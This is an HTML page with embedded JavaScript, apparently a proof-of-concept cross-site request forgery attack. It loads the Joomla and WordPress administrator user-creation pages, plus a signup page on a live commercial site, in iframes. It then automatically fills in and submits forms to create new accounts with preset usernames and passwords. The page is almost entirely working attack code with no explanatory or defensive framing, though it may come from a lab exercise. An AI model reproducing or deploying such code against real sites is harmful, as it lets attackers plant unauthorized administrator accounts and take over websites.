
<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
    </head>
    <body>

        <frameset>
            <!--    Joomla!     -->
            <iframe id="ifrJl" width="500" height="500" src="http://feevalecsrf.hol.es/joomla/administrator/index.php?option=com_users&view=user&layout=edit" style="display:;"></iframe>
            <!--    Qlix     -->
            <iframe id="ifrQlix" width="500" height="500" src="https://www.qlix.com.br/painel/cadastro" style="display:;"></iframe>
            <!--    Wordpress     -->
            <iframe id="ifrWp" width="500" height="500" src="http://feevalecsrf.hol.es/wordpress/wp-admin/user-new.php" style="display:;"></iframe>
        </frameset>

        <script type="text/javascript">

        	document.getElementById('ifrJl').onload = function() 
            {
                window.frames[0].document.getElementById('jform_name').value = "lg";
                window.frames[0].document.getElementById('jform_username').value = "luis_gustavo";
                window.frames[0].document.getElementById('jform_password').value = "123456abc";
                window.frames[0].document.getElementById('jform_password2').value = "123456abc";
                window.frames[0].document.getElementById('jform_email').value = "abc123@gmail.com";
                window.frames[0].document.getElementById('user.apply').submit();
            }

        	document.getElementById('ifrQlix').onload = function() 
        	{

        		window.frames[1].document.getElementById('nome').value = "lg";

        	}
            
            document.getElementById('ifrWp').onload = function() 
	        {
	            window.frames[2].document.getElementById('user_login').value = "lg";
	            window.frames[2].document.getElementById('email').value = "lg@lg.com.br";
	            window.frames[2].document.getElementById('first_name').value = "Luis"; 
	            window.frames[2].document.getElementById('last_name').value = "Gustavo"; 
	            window.frames[2].document.getElementById('pass1').value = "wpfraco123"; 
	            window.frames[2].document.getElementById('pass2').value = "wpfraco123";
	            window.frames[2].document.getElementById("createuser").submit();
	        }

        </script>
    </body>
</html>